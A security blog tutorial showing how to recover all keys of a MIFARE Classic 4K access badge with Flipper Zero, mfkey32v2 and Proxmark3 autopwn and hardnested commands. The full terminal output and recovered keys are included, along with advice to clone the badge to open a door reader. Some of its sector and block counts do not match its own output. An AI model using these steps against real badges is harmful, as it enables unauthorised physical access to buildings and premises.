Security as a Passion
Mifare 4K vs Flipper Zero and Proxmark3
March 3rd, 2023
It's been a long time that I didn't wrote anything but I'm still here.
Today we're going to talk about physical badge. We use them everyday at work or appartment or parking. It's important to know how to differentiate them and test their security. I'm going to focus on the one I had to break, a MIFARE Classic 4K.
Generalities on MIFARE
The official documentation is here: Mifare Official Doc
Within the MIFARE family you will find:
- MIFARE Classic
- MIFARE Plus
- MIFARE Ultralight
- MIFARE DESFire
As said, I have a Classic family card to test, and here it's mor particularly a Classic 4K.
The MIFARE Classic family is implementing the ISO/IEC 14443 Type A and more detailed reading regarding MIFARE on Wikipedia.
The Mifare 4K has:
- 40 sectors
- 80 keys
So, of course you've understand that the goal of the game is to find all these information using Flipper Zero and Proxmark3 :)
Flipper Zero
The Flipper Zero is a nice toolbox but regarding Mifare security badge breaking, he's limited at the level of brute force attack. The Flipper Zero is embedding dictionary within the firmware and are located here:
The default provided dictionary is (currently) containing ~1.250 Hexadecimal keys. When you read a badge, the flipper zero will try all the password contained in the USER password list first and then use the firmware default dictionary. On top of that, you will find that the bruteforce is limited by the NFC protocol and this limitation is around 20 attempts per seconds. Quite difficult to perform a real brute force in this condition. Anyway it's worth a try on your Mifare 4K before moving further.
This is the Flipper dictionary attack result on the Mifare 4K:
In my case, the default dictionary was able to retrieve 31 sectors. The Flipper zero was unable to go further than that as the Key B was not part of the dictionary.
The only choice left here to move forward is to use the Flipper Zero to read the badge reader and try to compute the keys from the gathered data using an external tool.
In order to gather the badge reader information, select "NFC" and then "Detect Reader".
The gathered information is now available in the file ".mfkey32.log" on the Flipper Zero:
It's time to compute the keys from the badge reader gathered information (nonces). The tool we are going to use is named mfkey32v2 and is available on github.
The usage of an external tool is mandatory as the Flipper Zero does not have enough CPU power and memory to perform this task. You can use the Lab Flipper OR the mfkey32v2 program.
Startup your Kali or Ubuntu, deploy mfkey, get your the badge reader information ".mfkey32.log" and execute the following command:
python3 mfkey_extract.py --extract .mfkey32.log
Starting local mode. Extracting key's from ".mfkey32.log"
Computing key's ...
- Key found: FA42ABB29F5D
Add the found key to your Flipper Zero User Dictionary in "NFC -> Assets". Use your Flipper Zero to read the NFC badge again and see that the Flipper Zero is now able to read more sector of the badge. Now, I am able to access 32 of the 40 sectors.
Depending of the result of your second badge reading you can:
- like me, have unlocked only one additional sector
- have unlock all the remaining sectors
- the badge reader open, congratz!
- the badge reader does not react at all, no accept and no refuse. It means that the badge reader is an old piece of crap not respecting the ISO standard at 13.56MHz. It means you must buy some Mifare 4K card online and write the data gathered on them.
- the badge reader refuse to open, it means that you need to unlock more sectors of the card. You should read the Proxmark3 part of this chapter.
Proxmark3
Let's assume that the previous step did not worked for the badge reader or that you're just stubborn like me and you want to break the whole card. This is where you need Proxmark3.
Proxmark3 has a lot of functionalities but for this exercise I'm going to focus to only what we need and consider that we are doing the attack without the previous information from the Flipper Zero. Just from scratch.
The two functions we are going to use are:
autopwnhardnested
Everything is in place, you put your badge on the Proxmark3 and you type the following:
[usb] pm3 --> hf mf autopwn
[!] ⚠ no known key was supplied, key recovery might fail
[+] loaded 45 keys from hardcoded default array
[=] running strategy 1
[=] Chunk 0.6s | found 32/32 keys (45)
[+] target sector 0 key type A -- found valid key [ A0A1A2A3A4A5 ] (used for nested / hardnested attack)
[+] target sector 0 key type B -- found valid key [ B0B1B2B3B4B5 ]
[+] target sector 1 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 1 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 2 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 2 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 3 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 3 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 4 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 4 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 5 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 5 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 6 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 6 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 7 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 7 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 8 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 8 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 9 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 9 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 10 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 10 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 11 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 11 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 12 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 12 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 13 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 13 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 14 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 14 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 15 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 15 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+] Sec | Blk | key A |res| key B |res
[+] -----+-----+--------------+---+--------------+----
[+] 000 | 003 | A0A1A2A3A4A5 | D | B0B1B2B3B4B5 | D
[+] 001 | 007 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 002 | 011 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 003 | 015 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 004 | 019 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 005 | 023 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 006 | 027 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 007 | 031 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 008 | 035 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 009 | 039 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 010 | 043 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 011 | 047 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 012 | 051 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 013 | 055 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 014 | 059 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 015 | 063 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] -----+-----+--------------+---+--------------+----
[=] ( D:Dictionary / S:darkSide / U:User / R:Reused / N:Nested / H:Hardnested / C:statiCnested / A:keyA )
[?] MAD key detected. Try `hf mf mad` for more details
What just happened?
Proxmark3 tried to bruteforce the badge using his own dictionary like the Flipper Zero. He's been able to break 15 sectors among 40. Let's continue.
What do we want to do? We want to break into the sector 16. We need to find key A and then key B and continue. This is where we are going to use the hardnested function.
Let's break key A of sector 16 block 64.
[usb] pm3 --> hf mf hardnested --blk 63 -a -k FFFFFFFFFFFF --tblk 64 --ta -w
[=] Target block no 64, target key type: A, known target key: 000000000000 (not set)
[=] File action: write, Slow: No, Tests: 0
[=] Hardnested attack starting...
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] | | | Expected to brute force
[=] Time | #nonces | Activity | #states | time
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] 0 | 0 | Start using 2 threads and AVX2 SIMD core | |
[=] 0 | 0 | Brute force benchmark: 497 million (2^28.9) keys/s | 140737488355328 | 3d
[=] 4 | 0 | Using 235 precalculated bitflip state tables | 140737488355328 | 3d
[#] AcquireEncryptedNonces finished
[=] 8 | 0 | Writing acquired nonces to binary file hf-mf-CardID-nonces.bin | 140737488355328 | 3d
[=] 9 | 112 | Apply bit flip properties | 52627398656 | 2min
[#] AcquireEncryptedNonces finished
[#] AcquireEncryptedNonces: Auth1 error
[=] 9 | 224 | Apply bit flip properties | 17443852288 | 35s
[#] AcquireEncryptedNonces finished
[=] 10 | 335 | Apply bit flip properties | 5793312768 | 12s
[#] AcquireEncryptedNonces finished
[#] AcquireEncryptedNonces finished
[=] 11 | 447 | Apply bit flip properties | 2009283840 | 4s
[#] AcquireEncryptedNonces finished
[=] 12 | 559 | Apply bit flip properties | 1907235968 | 4s
[#] AcquireEncryptedNonces finished
[=] 13 | 668 | Apply bit flip properties | 1247843200 | 3s
[=] 13 | 778 | Apply bit flip properties | 1247843200 | 3s
[#] AcquireEncryptedNonces finished
[=] 14 | 888 | Apply bit flip properties | 1247843200 | 3s
[#] AcquireEncryptedNonces finished
[=] 15 | 997 | Apply bit flip properties | 1247843200 | 3s
[#] AcquireEncryptedNonces finished
[=] 16 | 1105 | Apply bit flip properties | 1247843200 | 3s
[#] AcquireEncryptedNonces finished
[=] 16 | 1212 | Apply bit flip properties | 1247843200 | 3s
[#] AcquireEncryptedNonces finished
[#] AcquireEncryptedNonces finished
[=] 18 | 1322 | Apply Sum property. Sum(a0) = 120 | 403930912 | 1s
[=] 21 | 1322 | Brute force phase completed. Key found: A0A1A2A3A4A5 | 0 | 0s
Now let's do the same to break into key B of sector 16 Block 64.
hf mf hardnested --blk 63 -a -k FFFFFFFFFFFF --tblk 64 --tb -w
...
...
[=] 35 | 2094 | Brute force phase completed. Key found: B0B1B2B3B4B5 | 0 | 0s
Great! We now have broken into sector 16. Let's re-run the badge reading with the new keys found:
[usb] pm3 --> hf mf chk --4k -f /home/user/Documents/proxmark3/client/dictionaries/mfc_default_keys.dic
[+] loaded 1510 keys from dictionary file /home/user/Documents/proxmark3/client/dictionaries/mfc_default_keys.dic
[=] Start check for keys...
[=] .............................................................................
[=] time in checkkeys 200 seconds
[=] testing to read key B...
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+] Sec | Blk | key A |res| key B |res
[+] -----+-----+--------------+---+--------------+----
[+] 000 | 003 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 016 | 067 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 017 | 071 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 018 | 075 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 019 | 079 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 020 | 083 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 021 | 087 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 022 | 091 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 023 | 095 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 024 | 099 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 025 | 103 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 026 | 107 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 027 | 111 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 028 | 115 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 029 | 119 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 030 | 123 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 031 | 127 | ------------ | 0 | ------------ | 0
[+] 032 | 143 | ------------ | 0 | ------------ | 0
[+] 033 | 159 | ------------ | 0 | ------------ | 0
[+] 034 | 175 | ------------ | 0 | ------------ | 0
[+] 035 | 191 | ------------ | 0 | ------------ | 0
[+] 036 | 207 | ------------ | 0 | ------------ | 0
[+] 037 | 223 | ------------ | 0 | ------------ | 0
[+] 038 | 239 | ------------ | 0 | ------------ | 0
[+] 039 | 255 | ------------ | 0 | ------------ | 0
[+] -----+-----+--------------+---+--------------+----
Excellent, we are now at the same level as the brute force of the Flipper Zero! Let's try to break the next sector WITHOUT INTERACTING with the badge reader unlike the Flipper Zero.
[usb] pm3 --> hf mf hardnested --blk 123 -a -k FFFFFFFFFFFF --tblk 127 --ta -w
[=] Target block no 127, target key type: A, known target key: 000000000000 (not set)
[=] File action: write, Slow: No, Tests: 0
[=] Hardnested attack starting...
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] | | | Expected to brute force
[=] Time | #nonces | Activity | #states | time
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] 0 | 0 | Start using 2 threads and AVX2 SIMD core | |
[=] 0 | 0 | Brute force benchmark: 541 million (2^29.0) keys/s | 140737488355328 | 3d
[=] 4 | 0 | Using 235 precalculated bitflip state tables | 140737488355328 | 3d
[#] AcquireEncryptedNonces finished
[=] 7 | 0 | Writing acquired nonces to binary file hf-mf-CardID-nonces.bin | 140737488355328 | 3d
[=] 7 | 112 | Apply bit flip properties | 38384963584 | 71s
[#] AcquireEncryptedNonces finished
[#] AcquireEncryptedNonces finished
[=] 8 | 224 | Apply bit flip properties | 3732618240 | 7s
[#] AcquireEncryptedNonces finished
[=] 9 | 336 | Apply bit flip properties | 2997610752 | 6s
[#] AcquireEncryptedNonces finished
[=] 10 | 447 | Apply bit flip properties | 2368766208 | 4s
[#] AcquireEncryptedNonces finished
[=] 11 | 557 | Apply bit flip properties | 2368766208 | 4s
[=] 12 | 668 | Apply bit flip properties | 2141049600 | 4s
[#] AcquireEncryptedNonces finished
[=] 12 | 777 | Apply bit flip properties | 2141049600 | 4s
[#] AcquireEncryptedNonces finished
[=] 13 | 887 | Apply bit flip properties | 2141049600 | 4s
[#] AcquireEncryptedNonces finished
[=] 14 | 997 | Apply bit flip properties | 2141049600 | 4s
[#] AcquireEncryptedNonces finished
[=] 14 | 1108 | Apply bit flip properties | 2141049600 | 4s
[#] AcquireEncryptedNonces finished
[=] 15 | 1219 | Apply bit flip properties | 2141049600 | 4s
[#] AcquireEncryptedNonces finished
[=] 16 | 1329 | Apply bit flip properties | 2141049600 | 4s
[#] AcquireEncryptedNonces finished
[#] AcquireEncryptedNonces finished
[=] 19 | 1439 | Apply Sum property. Sum(a0) = 128 | 90193328 | 0s
[=] 19 | 1550 | Apply bit flip properties | 90193328 | 0s
[#] AcquireEncryptedNonces finished
[=] 20 | 1658 | Apply bit flip properties | 74804264 | 0s
[#] AcquireEncryptedNonces finished
[=] 21 | 1766 | Apply bit flip properties | 74804264 | 0s
[#] AcquireEncryptedNonces finished
[=] 21 | 1766 | (Ignoring Sum(a8) properties) | 74804264 | 0s
[=] 23 | 1766 | Brute force phase completed. Key found: FA42ABB29F5D | 0 | 0s
Proxmark3 just destroyed the key A of the next sector without needing the badge reader.
Now we want to go FURTHER than what we were able to do with the Flipper Zero. We want to break the Key B of this sector! Using the following syntax:
[usb] pm3 --> hf mf hardnested --blk 123 -a -k FFFFFFFFFFFF --tblk 127 --tb -w
[=] Target block no 127, target key type: B, known target key: 000000000000 (not set)
[=] File action: write, Slow: No, Tests: 0
[=] Hardnested attack starting...
...
...
[=] 26 | 2409 | Brute force phase completed. Key found: 82FAA7A24E65 | 0 | 0s
AMAZING! We've got it!
If you need to, you can continue using the same syntax to break into every other blocks of your badge. In my specific case I needed to perform it only 1 time again and after that every other sectors had the same key. We are now able to have a picture of our 40 sectors and their associated keys.
[usb] pm3 --> hf mf chk --4k -f /home/user/Documents/proxmark3/client/dictionaries/mfc_default_keys.dic
[+] loaded 1513 keys from dictionary file /home/user/Documents/proxmark3/client/dictionaries/mfc_default_keys.dic
[=] Start check for keys...
[=] .................................................................................
[=] time in checkkeys 11 seconds
[=] testing to read key B...
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+] Sec | Blk | key A |res| key B |res
[+] -----+-----+--------------+---+--------------+----
[+] 000 | 003 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 016 | 067 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 017 | 071 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 018 | 075 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 019 | 079 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 020 | 083 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 021 | 087 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 022 | 091 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 023 | 095 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 024 | 099 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 025 | 103 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 026 | 107 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 027 | 111 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 028 | 115 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 029 | 119 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 030 | 123 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 031 | 127 | FA42ABB29F5D | 1 | 82FAA7A24E65 | 1
[+] 032 | 143 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 033 | 159 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 034 | 175 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 035 | 191 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 036 | 207 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 037 | 223 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 038 | 239 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] 039 | 255 | BAF14C7567DF | 1 | BAF14C7567DF | 1
[+] -----+-----+--------------+---+--------------+----
The Mifare 4K badge compromission is complete. We now have all our necessary different keys and can even add them to our Flipper Zero to make our life easier.
You are now able to break any MIFARE 4K badge using Proxmark and simply add the keys to your Flipper Zero for ease.
Lot's of FUN!